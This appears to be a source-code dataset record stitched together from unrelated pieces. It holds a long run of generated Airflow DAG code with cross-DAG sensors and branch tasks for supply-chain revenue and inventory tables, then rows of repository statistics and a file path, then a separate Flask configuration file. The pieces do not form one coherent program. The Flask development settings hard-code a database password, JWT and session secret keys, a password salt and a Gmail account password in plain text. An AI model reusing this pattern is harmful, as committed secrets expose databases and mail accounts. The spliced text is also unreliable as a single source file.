BRANCH_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"
proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F"
D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_Daily_Revenue_F",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F)
BRANCH_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F.set_downstream(D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F)
D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F)
def branch_D_DM_SCMxD_INT_SCM__INT_RFQ_Master(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master","D_DM_SCMxD_INT_SCM__INT_RFQ_Master"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master","D_DM_SCMxD_INT_SCM__INT_RFQ_Master"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_RFQ_Master"
BRANCH_D_DM_SCMxD_INT_SCM__INT_RFQ_Master= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_RFQ_Master,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master"
proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_RFQ_Master"
D_DM_SCMxD_INT_SCM__INT_RFQ_Master= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_RFQ_Master",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_RFQ_Master.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master)
BRANCH_D_DM_SCMxD_INT_SCM__INT_RFQ_Master.set_downstream(D_DM_SCMxD_INT_SCM__INT_RFQ_Master)
D_DM_SCMxD_INT_SCM__INT_RFQ_Master.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master)
def branch_D_DM_SCMxD_INT_SCM__INT_Inventory_A(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A","D_DM_SCMxD_INT_SCM__INT_Inventory_A"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A","D_DM_SCMxD_INT_SCM__INT_Inventory_A"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_Inventory_A"
BRANCH_D_DM_SCMxD_INT_SCM__INT_Inventory_A= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_Inventory_A,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A"
proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_Inventory_A"
D_DM_SCMxD_INT_SCM__INT_Inventory_A= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_Inventory_A",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_Inventory_A.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A)
BRANCH_D_DM_SCMxD_INT_SCM__INT_Inventory_A.set_downstream(D_DM_SCMxD_INT_SCM__INT_Inventory_A)
D_DM_SCMxD_INT_SCM__INT_Inventory_A.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A)
def branch_D_DM_SCMxD_INT_SCM__INT_DOI_Actual(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual","D_DM_SCMxD_INT_SCM__INT_DOI_Actual"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual","D_DM_SCMxD_INT_SCM__INT_DOI_Actual"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_DOI_Actual"
BRANCH_D_DM_SCMxD_INT_SCM__INT_DOI_Actual= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_DOI_Actual,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual"
proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_DOI_Actual"
D_DM_SCMxD_INT_SCM__INT_DOI_Actual= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_DOI_Actual",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_DOI_Actual.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual)
BRANCH_D_DM_SCMxD_INT_SCM__INT_DOI_Actual.set_downstream(D_DM_SCMxD_INT_SCM__INT_DOI_Actual)
D_DM_SCMxD_INT_SCM__INT_DOI_Actual.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual)
def branch_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A","D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A","D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"]
return ["proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"
BRANCH_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"
proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"
D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="PNL_Revenue_Cost_A",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A)
BRANCH_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A.set_downstream(D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A)
D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A)
def branch_D_INT_SCMxD_ODS_SCM__NRE_Summary(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary","D_INT_SCMxD_ODS_SCM__NRE_Summary"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary","D_INT_SCMxD_ODS_SCM__NRE_Summary"]
return ["proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__NRE_Summary"
BRANCH_D_INT_SCMxD_ODS_SCM__NRE_Summary= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__NRE_Summary,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary"
proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__NRE_Summary"
D_INT_SCMxD_ODS_SCM__NRE_Summary= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="NRE_Summary",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__NRE_Summary.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary)
BRANCH_D_INT_SCMxD_ODS_SCM__NRE_Summary.set_downstream(D_INT_SCMxD_ODS_SCM__NRE_Summary)
D_INT_SCMxD_ODS_SCM__NRE_Summary.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary)
def branch_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F","D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F","D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"]
return ["proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"
BRANCH_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"
proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"
D_INT_SCMxD_ODS_SCM__Daily_Revenue_F= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="Daily_Revenue_F",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F)
BRANCH_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F.set_downstream(D_INT_SCMxD_ODS_SCM__Daily_Revenue_F)
D_INT_SCMxD_ODS_SCM__Daily_Revenue_F.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F)
def branch_D_INT_SCMxD_ODS_SCM__RFQ_Master(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master","D_INT_SCMxD_ODS_SCM__RFQ_Master"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master","D_INT_SCMxD_ODS_SCM__RFQ_Master"]
return ["proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__RFQ_Master"
BRANCH_D_INT_SCMxD_ODS_SCM__RFQ_Master= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__RFQ_Master,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master"
proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__RFQ_Master"
D_INT_SCMxD_ODS_SCM__RFQ_Master= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="RFQ_Master",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__RFQ_Master.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master)
BRANCH_D_INT_SCMxD_ODS_SCM__RFQ_Master.set_downstream(D_INT_SCMxD_ODS_SCM__RFQ_Master)
D_INT_SCMxD_ODS_SCM__RFQ_Master.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master)
def branch_D_INT_SCMxD_ODS_SCM__Inventory_A(**context):
    """Branch callable: decide whether to run the cross-DAG sensor on
    D_ODS_SCM.Inventory_A or skip straight to its proxy task.

    Returns the list of task ids to follow:
    - proxy + sensor when the schedules line up (see below);
    - proxy only otherwise (sensor branch is skipped).
    """
    mydag = context["dag"]
    upstream = DagBag().get_dag("D_ODS_SCM")
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        # At least one schedule is not in the std_interval table: only run the
        # sensor when both are non-standard AND exactly equal.
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_INT_SCMxD_ODS_SCM__Inventory_A", "D_INT_SCMxD_ODS_SCM__Inventory_A"]
    elif up_sch_interval >= my_sch_interval:
        # Both intervals are known (reuse the values already fetched above
        # instead of re-indexing std_interval).  Only wait on the upstream DAG
        # when its latest run coincides with this run's execution date.
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_INT_SCMxD_ODS_SCM__Inventory_A", "D_INT_SCMxD_ODS_SCM__Inventory_A"]
    return ["proxy_D_INT_SCMxD_ODS_SCM__Inventory_A"]
# Branch task: chooses between running the sensor or skipping to the proxy.
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__Inventory_A"
BRANCH_D_INT_SCMxD_ODS_SCM__Inventory_A = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_INT_SCMxD_ODS_SCM__Inventory_A,
    provide_context=True,
    dag=D_INT_SCM,
)
# Join point that runs whether or not the sensor branch was taken.
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__Inventory_A"
proxy_D_INT_SCMxD_ODS_SCM__Inventory_A = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_INT_SCM,
)
# Cross dag sensor waiting on D_ODS_SCM.Inventory_A.
my_taskid = "D_INT_SCMxD_ODS_SCM__Inventory_A"
D_INT_SCMxD_ODS_SCM__Inventory_A = ExternalTaskSensor(
    task_id=my_taskid,
    pool="sensor_pool",
    external_dag_id="D_ODS_SCM",
    external_task_id="Inventory_A",
    mode="reschedule",
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
    dag=D_INT_SCM,
)
# branch -> {proxy, sensor}; sensor -> proxy
BRANCH_D_INT_SCMxD_ODS_SCM__Inventory_A >> [
    proxy_D_INT_SCMxD_ODS_SCM__Inventory_A,
    D_INT_SCMxD_ODS_SCM__Inventory_A,
]
D_INT_SCMxD_ODS_SCM__Inventory_A >> proxy_D_INT_SCMxD_ODS_SCM__Inventory_A
def branch_D_INT_SCMxD_ODS_SCM__DOI_Actual(**context):
    """Branch callable: decide whether to run the cross-DAG sensor on
    D_ODS_SCM.DOI_Actual or skip straight to its proxy task.

    Returns the list of task ids to follow:
    - proxy + sensor when the schedules line up (see below);
    - proxy only otherwise (sensor branch is skipped).
    """
    mydag = context["dag"]
    upstream = DagBag().get_dag("D_ODS_SCM")
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        # At least one schedule is not in the std_interval table: only run the
        # sensor when both are non-standard AND exactly equal.
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual", "D_INT_SCMxD_ODS_SCM__DOI_Actual"]
    elif up_sch_interval >= my_sch_interval:
        # Both intervals are known (reuse the values already fetched above
        # instead of re-indexing std_interval).  Only wait on the upstream DAG
        # when its latest run coincides with this run's execution date.
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual", "D_INT_SCMxD_ODS_SCM__DOI_Actual"]
    return ["proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual"]
# Branch task: chooses between running the sensor or skipping to the proxy.
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__DOI_Actual"
BRANCH_D_INT_SCMxD_ODS_SCM__DOI_Actual = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_INT_SCMxD_ODS_SCM__DOI_Actual,
    provide_context=True,
    dag=D_INT_SCM,
)
# Join point that runs whether or not the sensor branch was taken.
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual"
proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_INT_SCM,
)
# Cross dag sensor waiting on D_ODS_SCM.DOI_Actual.
my_taskid = "D_INT_SCMxD_ODS_SCM__DOI_Actual"
D_INT_SCMxD_ODS_SCM__DOI_Actual = ExternalTaskSensor(
    task_id=my_taskid,
    pool="sensor_pool",
    external_dag_id="D_ODS_SCM",
    external_task_id="DOI_Actual",
    mode="reschedule",
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
    dag=D_INT_SCM,
)
# branch -> {proxy, sensor}; sensor -> proxy
BRANCH_D_INT_SCMxD_ODS_SCM__DOI_Actual >> [
    proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual,
    D_INT_SCMxD_ODS_SCM__DOI_Actual,
]
D_INT_SCMxD_ODS_SCM__DOI_Actual >> proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual
# XSLT:loop: JOB_FLOW_NAME-and-PRE_JOB: External: END}}
# XSLT:loop: JOB_FLOW_NAME: START{
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_SCM.PNL_Revenue_Cost_A
# The STG-init proxy fans out to every ODS-layer load task.
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG >> [
    PNL_Revenue_Cost_A,
    NRE_Summary,
    Daily_Revenue_F,
    RFQ_Master,
    Inventory_A,
    DOI_Actual,
]
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_DM_SCM.DM_PNL_Revenue_Cost_A
# Each DM task is gated by its matching INT-layer proxy.
proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A >> DM_PNL_Revenue_Cost_A
proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary >> DM_NRE_Summary
proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F >> DM_Daily_Revenue_F
proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master >> DM_RFQ_Master
proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A >> DM_Inventory_A
proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual >> DM_DOI_Actual
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_INT_SCM.INT_PNL_Revenue_Cost_A
# Each INT task is gated by its matching ODS-layer proxy.
proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A >> INT_PNL_Revenue_Cost_A
proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary >> INT_NRE_Summary
proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F >> INT_Daily_Revenue_F
proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master >> INT_RFQ_Master
proxy_D_INT_SCMxD_ODS_SCM__Inventory_A >> INT_Inventory_A
proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual >> INT_DOI_Actual
| 35.681781
| 125
| 0.760293
| 6,602
| 43,282
| 4.403817
| 0.035747
| 0.022013
| 0.037456
| 0.045401
| 0.934374
| 0.929146
| 0.922027
| 0.915801
| 0.901734
| 0.867373
| 0
| 0.00656
| 0.13717
| 43,282
| 1,212
| 126
| 35.711221
| 0.771964
| 0.134952
| 0
| 0.602564
| 1
| 0
| 0.201361
| 0.147786
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016317
| false
| 0
| 0.017483
| 0
| 0.08042
| 0.001166
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30bb60d30f58a95f80eba5ef5f41b73258fcd004
| 1,363
|
py
|
Python
|
src/api/config/config.py
|
nguyenhuunghi/author-manager
|
91d39c3fbbc63b2290c7c7138a18bee0258348f8
|
[
"MIT"
] | null | null | null |
src/api/config/config.py
|
nguyenhuunghi/author-manager
|
91d39c3fbbc63b2290c7c7138a18bee0258348f8
|
[
"MIT"
] | null | null | null |
src/api/config/config.py
|
nguyenhuunghi/author-manager
|
91d39c3fbbc63b2290c7c7138a18bee0258348f8
|
[
"MIT"
] | null | null | null |
class Config(object):
    """Base Flask configuration shared by all environments."""
    DEBUG = False
    TESTING = False
    # Disable Flask-SQLAlchemy's modification-tracking signal machinery.
    SQLALCHEMY_TRACK_MODIFICATIONS = False
class Production(Config):
    """Production environment settings.

    NOTE(review): the DB URL is a placeholder; it must be supplied (ideally
    via an environment variable) before deployment.
    """
    SQLALCHEMY_DATABASE_URI = '<Production DB URL>'
class Development(Config):
    """Local development settings: debug on, local Postgres, Gmail SMTP.

    NOTE(review): real-looking credentials (DB password, JWT/secret keys,
    mail password) are hard-coded in source. They should be loaded from
    environment variables or a secret store, and these values rotated.
    """
    # psql postgresql://Nghi:nghi1996@localhost/postgres
    DEBUG = True
    SQLALCHEMY_DATABASE_URI = 'postgresql://Nghi:nghi1996@localhost/postgres'
    SQLALCHEMY_ECHO = False
    JWT_SECRET_KEY = 'JWT_SECRET_NGHI!123'
    SECRET_KEY = 'SECRET_KEY_NGHI_ABC!123'
    SECURITY_PASSWORD_SALT = 'SECURITY_PASSWORD_SALT_NGHI_ABC!123'
    MAIL_DEFAULT_SENDER = 'dev2020@localhost'
    MAIL_SERVER = 'smtp.gmail.com'
    # Port 465 with SSL (TLS off, SSL on below).
    MAIL_PORT = 465
    MAIL_USERNAME = 'nghidev2020@gmail.com'
    MAIL_PASSWORD = 'nghi1996'
    MAIL_USE_TLS = False
    MAIL_USE_SSL = True
    # Relative directory used for uploaded image files.
    UPLOAD_FOLDER = 'images'
class Testing(Config):
    """Test-run settings; mirrors Development except TESTING is enabled.

    NOTE(review): the test DB URI is commented out, so this class defines no
    SQLALCHEMY_DATABASE_URI of its own — confirm the test harness supplies one.
    Hard-coded secrets duplicated from Development should come from the
    environment instead.
    """
    TESTING = True
    # SQLALCHEMY_DATABASE_URI = 'postgresql://Nghi:nghi1996@localhost/postgres_test'
    SQLALCHEMY_ECHO = False
    JWT_SECRET_KEY = 'JWT_SECRET_NGHI!123'
